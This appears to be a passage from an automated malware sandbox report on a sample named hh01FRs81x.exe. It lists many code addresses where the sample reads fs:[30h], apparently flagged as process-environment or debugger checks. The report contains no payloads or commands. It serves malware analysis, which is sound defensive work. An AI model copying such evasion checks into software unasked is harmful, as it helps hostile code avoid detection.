                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169674D mov esi, dword ptr fs:[00000030h]4_2_0169674D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169674D mov eax, dword ptr fs:[00000030h]4_2_0169674D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169674D mov eax, dword ptr fs:[00000030h]4_2_0169674D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE75D mov eax, dword ptr fs:[00000030h]4_2_016EE75D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660750 mov eax, dword ptr fs:[00000030h]4_2_01660750
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2750 mov eax, dword ptr fs:[00000030h]4_2_016A2750
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2750 mov eax, dword ptr fs:[00000030h]4_2_016A2750
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C720 mov eax, dword ptr fs:[00000030h]4_2_0169C720
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C720 mov eax, dword ptr fs:[00000030h]4_2_0169C720
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169273C mov eax, dword ptr fs:[00000030h]4_2_0169273C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169273C mov ecx, dword ptr fs:[00000030h]4_2_0169273C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169273C mov eax, dword ptr fs:[00000030h]4_2_0169273C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DC730 mov eax, dword ptr fs:[00000030h]4_2_016DC730
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C700 mov eax, dword ptr fs:[00000030h]4_2_0169C700
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660710 mov eax, dword ptr fs:[00000030h]4_2_01660710
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01690710 mov eax, dword ptr fs:[00000030h]4_2_01690710
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016827ED mov eax, dword ptr fs:[00000030h]4_2_016827ED
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016827ED mov eax, dword ptr fs:[00000030h]4_2_016827ED
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016827ED mov eax, dword ptr fs:[00000030h]4_2_016827ED
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE7E1 mov eax, dword ptr fs:[00000030h]4_2_016EE7E1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016647FB mov eax, dword ptr fs:[00000030h]4_2_016647FB
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016647FB mov eax, dword ptr fs:[00000030h]4_2_016647FB
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166C7C0 mov eax, dword ptr fs:[00000030h]4_2_0166C7C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E07C3 mov eax, dword ptr fs:[00000030h]4_2_016E07C3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016607AF mov eax, dword ptr fs:[00000030h]4_2_016607AF
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017147A0 mov eax, dword ptr fs:[00000030h]4_2_017147A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170678E mov eax, dword ptr fs:[00000030h]4_2_0170678E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A660 mov eax, dword ptr fs:[00000030h]4_2_0169A660
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A660 mov eax, dword ptr fs:[00000030h]4_2_0169A660
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172866E mov eax, dword ptr fs:[00000030h]4_2_0172866E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172866E mov eax, dword ptr fs:[00000030h]4_2_0172866E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01692674 mov eax, dword ptr fs:[00000030h]4_2_01692674
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167C640 mov eax, dword ptr fs:[00000030h]4_2_0167C640
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167E627 mov eax, dword ptr fs:[00000030h]4_2_0167E627
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01696620 mov eax, dword ptr fs:[00000030h]4_2_01696620
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01698620 mov eax, dword ptr fs:[00000030h]4_2_01698620
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166262C mov eax, dword ptr fs:[00000030h]4_2_0166262C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE609 mov eax, dword ptr fs:[00000030h]4_2_016DE609
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0167260B mov eax, dword ptr fs:[00000030h]4_2_0167260B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016A2619 mov eax, dword ptr fs:[00000030h]4_2_016A2619
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE6F2 mov eax, dword ptr fs:[00000030h]4_2_016DE6F2
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E06F1 mov eax, dword ptr fs:[00000030h]4_2_016E06F1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E06F1 mov eax, dword ptr fs:[00000030h]4_2_016E06F1
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0169A6C7
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A6C7 mov eax, dword ptr fs:[00000030h]4_2_0169A6C7
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C6A6 mov eax, dword ptr fs:[00000030h]4_2_0169C6A6
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016966B0 mov eax, dword ptr fs:[00000030h]4_2_016966B0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664690 mov eax, dword ptr fs:[00000030h]4_2_01664690
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664690 mov eax, dword ptr fs:[00000030h]4_2_01664690
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01704978 mov eax, dword ptr fs:[00000030h]4_2_01704978
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01704978 mov eax, dword ptr fs:[00000030h]4_2_01704978
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01686962 mov eax, dword ptr fs:[00000030h]4_2_01686962
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01686962 mov eax, dword ptr fs:[00000030h]4_2_01686962
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01686962 mov eax, dword ptr fs:[00000030h]4_2_01686962
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC97C mov eax, dword ptr fs:[00000030h]4_2_016EC97C
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E0946 mov eax, dword ptr fs:[00000030h]4_2_016E0946
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734940 mov eax, dword ptr fs:[00000030h]4_2_01734940
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E892A mov eax, dword ptr fs:[00000030h]4_2_016E892A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F892B mov eax, dword ptr fs:[00000030h]4_2_016F892B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE908 mov eax, dword ptr fs:[00000030h]4_2_016DE908
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DE908 mov eax, dword ptr fs:[00000030h]4_2_016DE908
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC912 mov eax, dword ptr fs:[00000030h]4_2_016EC912
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01658918 mov eax, dword ptr fs:[00000030h]4_2_01658918
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01658918 mov eax, dword ptr fs:[00000030h]4_2_01658918
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE9E0 mov eax, dword ptr fs:[00000030h]4_2_016EE9E0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016929F9 mov eax, dword ptr fs:[00000030h]4_2_016929F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016929F9 mov eax, dword ptr fs:[00000030h]4_2_016929F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172A9D3 mov eax, dword ptr fs:[00000030h]4_2_0172A9D3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F69C0 mov eax, dword ptr fs:[00000030h]4_2_016F69C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166A9D0 mov eax, dword ptr fs:[00000030h]4_2_0166A9D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016949D0 mov eax, dword ptr fs:[00000030h]4_2_016949D0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016729A0 mov eax, dword ptr fs:[00000030h]4_2_016729A0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016609AD mov eax, dword ptr fs:[00000030h]4_2_016609AD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016609AD mov eax, dword ptr fs:[00000030h]4_2_016609AD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E89B3 mov esi, dword ptr fs:[00000030h]4_2_016E89B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E89B3 mov eax, dword ptr fs:[00000030h]4_2_016E89B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016E89B3 mov eax, dword ptr fs:[00000030h]4_2_016E89B3
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE872 mov eax, dword ptr fs:[00000030h]4_2_016EE872
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EE872 mov eax, dword ptr fs:[00000030h]4_2_016EE872
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6870 mov eax, dword ptr fs:[00000030h]4_2_016F6870
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6870 mov eax, dword ptr fs:[00000030h]4_2_016F6870
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01690854 mov eax, dword ptr fs:[00000030h]4_2_01690854
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664859 mov eax, dword ptr fs:[00000030h]4_2_01664859
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01664859 mov eax, dword ptr fs:[00000030h]4_2_01664859
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170483A mov eax, dword ptr fs:[00000030h]4_2_0170483A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170483A mov eax, dword ptr fs:[00000030h]4_2_0170483A
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169A830 mov eax, dword ptr fs:[00000030h]4_2_0169A830
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov ecx, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01682835 mov eax, dword ptr fs:[00000030h]4_2_01682835
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC810 mov eax, dword ptr fs:[00000030h]4_2_016EC810
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C8F9 mov eax, dword ptr fs:[00000030h]4_2_0169C8F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169C8F9 mov eax, dword ptr fs:[00000030h]4_2_0169C8F9
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172A8E4 mov eax, dword ptr fs:[00000030h]4_2_0172A8E4
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_017308C0 mov eax, dword ptr fs:[00000030h]4_2_017308C0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660887 mov eax, dword ptr fs:[00000030h]4_2_01660887
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016EC89D mov eax, dword ptr fs:[00000030h]4_2_016EC89D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0165CB7E mov eax, dword ptr fs:[00000030h]4_2_0165CB7E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170EB50 mov eax, dword ptr fs:[00000030h]4_2_0170EB50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01732B57 mov eax, dword ptr fs:[00000030h]4_2_01732B57
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6B40 mov eax, dword ptr fs:[00000030h]4_2_016F6B40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F6B40 mov eax, dword ptr fs:[00000030h]4_2_016F6B40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01708B42 mov eax, dword ptr fs:[00000030h]4_2_01708B42
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0172AB40 mov eax, dword ptr fs:[00000030h]4_2_0172AB40
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01658B50 mov eax, dword ptr fs:[00000030h]4_2_01658B50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01714B4B mov eax, dword ptr fs:[00000030h]4_2_01714B4B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01714B4B mov eax, dword ptr fs:[00000030h]4_2_01714B4B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168EB20 mov eax, dword ptr fs:[00000030h]4_2_0168EB20
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168EB20 mov eax, dword ptr fs:[00000030h]4_2_0168EB20
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01728B28 mov eax, dword ptr fs:[00000030h]4_2_01728B28
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01728B28 mov eax, dword ptr fs:[00000030h]4_2_01728B28
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DEB1D mov eax, dword ptr fs:[00000030h]4_2_016DEB1D
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734B00 mov eax, dword ptr fs:[00000030h]4_2_01734B00
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668BF0 mov eax, dword ptr fs:[00000030h]4_2_01668BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668BF0 mov eax, dword ptr fs:[00000030h]4_2_01668BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668BF0 mov eax, dword ptr fs:[00000030h]4_2_01668BF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016ECBF0 mov eax, dword ptr fs:[00000030h]4_2_016ECBF0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170EBD0 mov eax, dword ptr fs:[00000030h]4_2_0170EBD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660BCD mov eax, dword ptr fs:[00000030h]4_2_01660BCD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660BCD mov eax, dword ptr fs:[00000030h]4_2_01660BCD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660BCD mov eax, dword ptr fs:[00000030h]4_2_01660BCD
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01714BB0 mov eax, dword ptr fs:[00000030h]4_2_01714BB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01714BB0 mov eax, dword ptr fs:[00000030h]4_2_01714BB0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670BBE mov eax, dword ptr fs:[00000030h]4_2_01670BBE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670BBE mov eax, dword ptr fs:[00000030h]4_2_01670BBE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169CA6F mov eax, dword ptr fs:[00000030h]4_2_0169CA6F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169CA6F mov eax, dword ptr fs:[00000030h]4_2_0169CA6F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169CA6F mov eax, dword ptr fs:[00000030h]4_2_0169CA6F
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0170EA60 mov eax, dword ptr fs:[00000030h]4_2_0170EA60
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DCA72 mov eax, dword ptr fs:[00000030h]4_2_016DCA72
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016DCA72 mov eax, dword ptr fs:[00000030h]4_2_016DCA72
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666A50 mov eax, dword ptr fs:[00000030h]4_2_01666A50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666A50 mov eax, dword ptr fs:[00000030h]4_2_01666A50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666A50 mov eax, dword ptr fs:[00000030h]4_2_01666A50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666A50 mov eax, dword ptr fs:[00000030h]4_2_01666A50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666A50 mov eax, dword ptr fs:[00000030h]4_2_01666A50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666A50 mov eax, dword ptr fs:[00000030h]4_2_01666A50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01666A50 mov eax, dword ptr fs:[00000030h]4_2_01666A50
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670A5B mov eax, dword ptr fs:[00000030h]4_2_01670A5B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01670A5B mov eax, dword ptr fs:[00000030h]4_2_01670A5B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0168EA2E mov eax, dword ptr fs:[00000030h]4_2_0168EA2E
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169CA24 mov eax, dword ptr fs:[00000030h]4_2_0169CA24
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169CA38 mov eax, dword ptr fs:[00000030h]4_2_0169CA38
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01684A35 mov eax, dword ptr fs:[00000030h]4_2_01684A35
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01684A35 mov eax, dword ptr fs:[00000030h]4_2_01684A35
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016ECA11 mov eax, dword ptr fs:[00000030h]4_2_016ECA11
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169AAEE mov eax, dword ptr fs:[00000030h]4_2_0169AAEE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0169AAEE mov eax, dword ptr fs:[00000030h]4_2_0169AAEE
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016B6ACC mov eax, dword ptr fs:[00000030h]4_2_016B6ACC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016B6ACC mov eax, dword ptr fs:[00000030h]4_2_016B6ACC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016B6ACC mov eax, dword ptr fs:[00000030h]4_2_016B6ACC
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660AD0 mov eax, dword ptr fs:[00000030h]4_2_01660AD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01694AD0 mov eax, dword ptr fs:[00000030h]4_2_01694AD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01694AD0 mov eax, dword ptr fs:[00000030h]4_2_01694AD0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668AA0 mov eax, dword ptr fs:[00000030h]4_2_01668AA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668AA0 mov eax, dword ptr fs:[00000030h]4_2_01668AA0
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_0166EA80 mov eax, dword ptr fs:[00000030h]4_2_0166EA80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01734A80 mov eax, dword ptr fs:[00000030h]4_2_01734A80
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01698A90 mov edx, dword ptr fs:[00000030h]4_2_01698A90
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_016F8D6B mov eax, dword ptr fs:[00000030h]4_2_016F8D6B
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660D59 mov eax, dword ptr fs:[00000030h]4_2_01660D59
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660D59 mov eax, dword ptr fs:[00000030h]4_2_01660D59
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01660D59 mov eax, dword ptr fs:[00000030h]4_2_01660D59
                Source: C:\Users\user\Desktop\hh01FRs81x.exeCode function: 4_2_01668D59 mov eax, dword ptr fs:[00000030h]4_2_01668D59
